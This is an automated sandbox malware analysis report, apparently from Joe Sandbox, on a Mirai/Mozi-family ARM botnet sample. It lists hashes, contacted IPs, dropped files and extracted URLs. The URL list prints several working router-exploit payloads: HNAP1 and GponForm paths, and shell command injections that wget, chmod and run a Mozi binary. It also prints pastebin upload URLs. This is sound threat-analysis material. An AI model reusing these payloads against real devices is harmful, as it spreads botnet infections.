
KnAY2OIPI3

Status: finished
Submission Time: 2021-05-01 17:50:31 +02:00
Labels: Malicious, Spreader, Trojan, Evader, Mirai

Details

  • Analysis ID:
    402062
  • API (Web) ID:
    706281
  • Analysis Started:
    2021-05-01 17:50:31 +02:00
  • Analysis Finished:
    2021-05-01 18:01:14 +02:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:

Engine | Detection | Score | System
Joe Sandbox | malicious | 100 | Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Detection | Score
malicious | 40/59
malicious | 20/37
malicious | 20/29
malicious |

IPs

IP | Country
185.8.165.103 | Czech Republic
91.39.50.75 | Germany
150.94.181.169 | Japan
115.216.161.117 | China
38.66.167.189 | United States
196.2.152.33 | South Africa
100.58.97.165 | United States
27.208.150.177 | China
165.147.231.202 | South Africa
122.14.26.131 | China
217.26.218.59 | United Kingdom
105.23.23.99 | Mauritius
133.53.157.82 | Japan
103.167.29.254 | unknown
126.66.70.2 | Japan
218.99.163.37 | China
179.5.114.184 | El Salvador
37.198.64.4 | Sweden
62.37.123.164 | Spain
32.38.64.238 | United States
222.118.224.59 | Korea Republic of
124.106.81.28 | Philippines
220.131.247.227 | Taiwan; Republic of China (ROC)
167.108.60.0 | Uruguay
64.227.0.234 | United States
171.37.201.166 | China
129.39.197.165 | United States
216.144.192.30 | United States
182.90.150.203 | China
181.228.162.132 | Argentina
162.165.207.141 | United States
20.177.182.208 | United States
124.164.21.186 | China
170.102.192.11 | Sweden
221.136.83.195 | China
172.200.33.30 | United States
98.125.252.19 | United States
191.125.31.198 | Chile
69.1.46.186 | United States
211.249.221.67 | Korea Republic of
42.117.16.157 | Viet Nam
56.99.140.32 | United States
86.112.104.146 | United Kingdom
54.161.176.221 | United States
40.108.216.138 | United States
72.185.234.219 | United States
58.178.78.48 | Australia
123.144.168.163 | China
192.170.164.35 | United States
41.209.27.240 | Kenya
193.63.110.24 | United Kingdom
185.149.152.118 | Lithuania
96.254.228.27 | United States
88.128.154.190 | Germany
216.155.36.104 | United States
218.133.250.221 | Japan
171.149.135.6 | United States
83.177.255.20 | Sweden
195.220.247.126 | France
197.81.37.161 | South Africa
195.167.58.217 | Greece
164.87.137.230 | United States
102.198.183.70 | unknown
68.55.232.254 | United States
38.112.119.34 | United States
176.23.157.80 | Denmark
121.211.248.199 | Australia
217.151.165.60 | Iceland
65.171.3.34 | United States
73.11.11.167 | United States
130.67.62.44 | Norway
103.139.115.132 | Singapore
123.45.141.9 | Korea Republic of
89.141.126.147 | Spain
211.35.117.179 | Korea Republic of
121.97.146.176 | Philippines
218.85.205.133 | China
49.40.181.238 | India
216.26.159.203 | United States
1.151.13.11 | Australia
29.11.239.185 | United States
19.252.51.218 | United States
77.94.17.59 | Kazakhstan
38.198.214.3 | United States
193.115.92.108 | Australia
53.220.117.17 | Germany
222.191.119.202 | China
160.173.189.54 | Morocco
59.92.7.51 | India
84.203.232.63 | Ireland
101.132.239.79 | China
135.91.62.232 | United States
74.26.22.165 | United States
126.182.147.115 | Japan
65.57.76.79 | United States
160.20.53.101 | Hong Kong
128.109.48.130 | United States
124.26.145.221 | Japan
119.101.173.5 | China
130.196.33.127 | United States

Domains

Name | IP
dht.transmissionbt.com | 212.129.33.59
bttracker.acc.umu.se | 130.239.18.159
router.bittorrent.com | 67.215.246.10
router.utorrent.com | 82.221.103.244
bttracker.debian.org | 0.0.0.0

URLs

Name Detection
http://127.0.0.1:80/GponForm/diag_Form?images/
http://52.58.36.52:80/HNAP1/
http://92.122.164.134:80/HNAP1/
http://114.158.233.160:80/HNAP1/
http://65.110.89.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://38.35.98.151:80/HNAP1/
http://182.254.240.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://149.47.68.142:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://164.132.44.102:80/HNAP1/
http://168.226.35.54:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://173.222.98.151:80/HNAP1/
http://216.164.6.45:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://199.204.251.131:80/HNAP1/
http://%s:%d/bin.sh
http://171.247.8.159:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://172.82.182.74:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://155.230.225.129:80/HNAP1/
http://134.84.133.102:80/HNAP1/
http://23.78.24.125:80/HNAP1/
http://66.221.91.189:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org/alsa-info.sh
http://schemas.xmlsoap.org/soap/envelope//
http://HTTP/1.1
http://www.alsa-project.org.
http://purenetworks.com/HNAP1/
http://www.pastebin.ca
http://%s:%d/Mozi.a;chmod
http://127.0.0.1:7574/UD/act?1
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://ipinfo.io/ip
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://%s:%d/Mozi.m
http://127.0.0.1sendcmd
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://%s:%d/Mozi.m;
http://www.pastebin.ca/upload.php
http://www.alsa-project.org/cardinfo-db/
http://schemas.xmlsoap.org/soap/encoding/
http://pastebin.ca)
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$

Dropped files

Name | File Type
/etc/init.d/mountall.sh | ASCII text
/usr/bin/gettext.sh | ASCII text
/usr/networks | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
/usr/sbin/alsa-info.sh | ASCII text, with very long lines
/etc/rcS.d/S95baby.sh | POSIX shell script, ASCII text executable
/etc/rc.local | ASCII text
/etc/profile.d/vte-2.91.sh | ASCII text
/etc/profile.d/cedilla-portuguese.sh | ASCII text
/etc/profile.d/bash_completion.sh | ASCII text
/etc/profile.d/apps-bin-path.sh | ASCII text
/etc/profile.d/Z97-byobu.sh | ASCII text
/etc/init.d/umountnfs.sh | ASCII text
/etc/init.d/mountnfs.sh | ASCII text
/etc/init.d/mountnfs-bootclean.sh | ASCII text
/etc/init.d/mountkernfs.sh | ASCII text
/etc/init.d/mountdevsubfs.sh | ASCII text
/etc/init.d/mountall-bootclean.sh | ASCII text
/etc/init.d/hwclock.sh | ASCII text
/etc/init.d/hostname.sh | ASCII text
/etc/init.d/checkroot.sh | ASCII text
/etc/init.d/checkroot-bootclean.sh | ASCII text
/etc/init.d/checkfs.sh | ASCII text
/etc/init.d/bootmisc.sh | ASCII text
/etc/init.d/S95baby.sh | POSIX shell script, ASCII text executable
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-whatchanged.sh | ASCII text
/usr/share/doc/git/contrib/fast-import/git-import.sh | ASCII text
/usr/share/doc/git/contrib/git-resurrect.sh | ASCII text
/usr/share/doc/git/contrib/remotes2config.sh | ASCII text
/usr/share/doc/git/contrib/rerere-train.sh | ASCII text
/usr/share/doc/git/contrib/subtree/git-subtree.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-verify-tag.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-tag.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-revert.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-resolve.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-reset.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-repack.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-pull.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-notes.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-merge.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-merge-ours.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-ls-remote.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh | ASCII text
/usr/share/doc/xdotool/examples/ffsp.sh | ASCII text
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh | ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh | ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh | ASCII text
/usr/share/doc/tmux/examples/bash_completion_tmux.sh | ASCII text
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh | ASCII text
/usr/share/doc/netcat-openbsd/examples/dist.sh | ASCII text
/usr/share/doc/mdadm/examples/mdadd.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh | ASCII text
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh | ASCII text
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh | ASCII text
/usr/share/doc/ifupdown/examples/ping-places.sh | ASCII text
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh | ASCII text
/usr/share/doc/ifupdown/examples/get-mac-address.sh | ASCII text
/usr/share/doc/ifupdown/examples/check-mac-address.sh | ASCII text
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh | ASCII text
/etc/wpa_supplicant/functions.sh | ASCII text
/usr/share/cups/braille/indexv4.sh | ASCII text
/usr/share/cups/braille/indexv3.sh | ASCII text
/usr/share/cups/braille/index.sh | ASCII text
/usr/share/cups/braille/cups-braille.sh | UTF-8 Unicode text
/usr/share/brltty/initramfs/brltty.sh | ASCII text
/usr/share/alsa/utils.sh | ASCII text
/usr/share/alsa-base/alsa-info.sh | ASCII text, with very long lines
/tmp/.config | ASCII text
/etc/wpa_supplicant/ifupdown.sh | ASCII text
/usr/share/debconf/confmodule.sh | ASCII text
/etc/wpa_supplicant/action_wpa.sh | ASCII text
/etc/bash_completion.d/libreoffice.sh | ASCII text
/etc/acpi/undock.sh | ASCII text
/etc/acpi/tosh-wireless.sh | ASCII text
/etc/acpi/powerbtn.sh | ASCII text
/etc/acpi/ibm-wireless.sh | ASCII text
/etc/acpi/asus-wireless.sh | ASCII text
/etc/acpi/asus-keyboard-backlight.sh | ASCII text
/usr/share/doc/gdb/contrib/expect-read1.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-gc.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-fetch.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-commit.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-clone.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-clean.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-checkout.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-am.sh | OS/2 REXX batch file, ASCII text
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh | ASCII text
/usr/share/doc/gdb/contrib/gdb-add-index.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-log.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/gdb_find.sh | ASCII text
/boot/grub/i386-pc/modinfo.sh | ASCII text
/usr/share/doc/gawk/examples/prog/igawk.sh | awk or perl script, ASCII text
/usr/share/doc/gawk/examples/network/PostAgent.sh | ASCII text
/usr/share/doc/cron/examples/cron-tasks-review.sh | ASCII text
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh | ASCII text
/usr/share/doc/acpid/examples/default.sh | ASCII text
/usr/share/doc/acpid/examples/ac.sh | ASCII text